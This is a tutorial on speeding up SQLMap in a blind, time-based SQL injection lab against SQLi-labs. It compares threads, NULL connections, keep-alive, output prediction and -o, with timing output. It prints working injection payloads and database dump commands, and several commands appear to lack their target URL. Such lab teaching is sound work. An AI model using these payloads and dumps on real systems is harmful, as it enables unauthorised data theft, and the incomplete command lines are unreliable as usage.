Speeding Up the Process (in a Blind and Time Based Scenario) on SQLMap

From our previous videos, we have only performed single-thread operations of SQLMap. But, in real life, it is not that easy. There are hundreds of rows that might be present inside a table. So, it means, the operation may take a long time to complete the process. So, we may need to speed up these operations.

Luckily, the developers of SQLMap have provided us with four types of optimization techniques that will help us speed up the process.

From the SQL Map Advanced help menu, we got four types of switches, as marked in color below:

    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

Let’s explain them one by one. In this video, we will be going to perform this operation in a Blind and Time-based scenario.

Go back to the home page of SQLi-labs and click on this marked link:

Similar to the previous chapters, we have to input the ID as a parameter with a numeric value on top of the URL bar:

http://<your IP>/sqli-labs-master/less-9/?id=1

Now, let’s perform SQLMap, and firstly, try to exploit this injection.

└─$ sqlmap --batch   

The --batch switch is used to enable a non-interactive session, once we use the switch the interactive shell will never ask for user input, it will automatically input default behavior.

The time Linux command-line utility automatically tracks and monitors the actual timing of completion of the processes.

The time taken for this operation is listed below:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 1907=1907 AND 'EPDB'='EPDB

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1617 FROM (SELECT(SLEEP(5)))LfOv) AND 'absg'='absg

Now, we have confirmed that the injection is Blind and Time-based. Now, we are ready, let’s continue our topic.

Previously, I have told you that SQLMap provides us four types of optimization techniques as follows: 

  • Multi-threading
  • NULL connections
  • HTTP persistent connections
  • Output prediction


As we have already mentioned, SQL Map runs on only one single thread, which means it is darn slow. We can utilize the --threads switch and specify a value for the number of threads, which ranges from 1 to 10. By increasing the thread count, it can dramatically increase the overall performance of SQLMap.

Let's try that out. First, let's try to dump all the tables under the database security without the threads option. Here I am going to use the time command line utility to track and monitor the time.

└─$ time sqlmap -D security --dump

The time Linux command-line utility automatically tracks and monitors the actual timing of completion of the processes.

The time taken for this operation is listed below:

real    94.28s
user    5.17s
sys     22.54s
cpu     29%

Now, let's attempt to do the same with a thread count of 4. But each time we have to remove the log file of the previous operations.

└─$ rm -rf /home/kali/.local/share/sqlmap/output/

└─$ time sqlmap -u -D security --dump --threads 4

The time taken for this operation is listed below:

real    19.72s
user    1.89s
sys     5.18s
cpu     35%

As you can see, the running time has decreased with additional threads.

NULL connection

The NULL connection is enabled by the --null-connection command-line switch. 

└─$ time sqlmap -u -D security --dump --null-connection

The NULL connection option in SQLMap will try to exploit the injection without actually retrieving the full HTML body of the target. Instead, it utilizes various HTTP properties, such as Range and HEAD to retrieve a certain section of the HTML body, or just simply checks the response length to determine TRUE and FALSE situations.

The time taken for this operation is listed below:

real    2.80s
user    1.29s
sys     0.98s
cpu     80%

If compare it with the previous then you will find out a significant difference. But as the process time decreases, which means CPU usage is high compared to others.

HTTP persistent connections

By default, SQLMap closes, opens, and recloses the connection to the target server as per your requirements, but this can sometimes create a bit of overhead. In case there is an overhead, this can be optimized by using the --keep-alive switch which uses the HTTP's persistent connection mechanism, and the exchange of data happens over an already opened connection.

└─$ time sqlmap -u -D security --dump --keep-alive

The time taken for this operation is listed below:

real    2.75s
user    1.22s
sys     1.13s
cpu     85%

If you compare it with the previous out you will find a significant difference.

Output prediction

To speed up things even further, SQLMap takes a very novel approach.

└─$ time sqlmap -u -D security --dump --predict-output

The output-prediction switch uses a table of precompiled datasets containing some common outputs found during SQL injections.

The time taken for this operation is listed below:

real    2.60s
user    1.21s
sys     1.02s
cpu     85%

 If you compare it with others, then you will notice basic differences in process time.

Basic Optimization 

SQLMap provides an option to turn on some of the flags for performance optimization by using the -o switch.

└─$ time sqlmap -u -D security --dump -o     

These flags will enable as follows:

  • --keep-alive  
  • --null-connection 
  • --threads 3

This basically enables persistent connections, NULL connections, and multiple threads to three. This setting can be enabled to achieve rudimentary performance benefits in certain types of injections like those that are error-based.

The time taken for this operation is listed below:

real    2.66s
user    1.12s
sys     1.04s
cpu     81%

If you compare it with others, then you will notice basic differences in process time.

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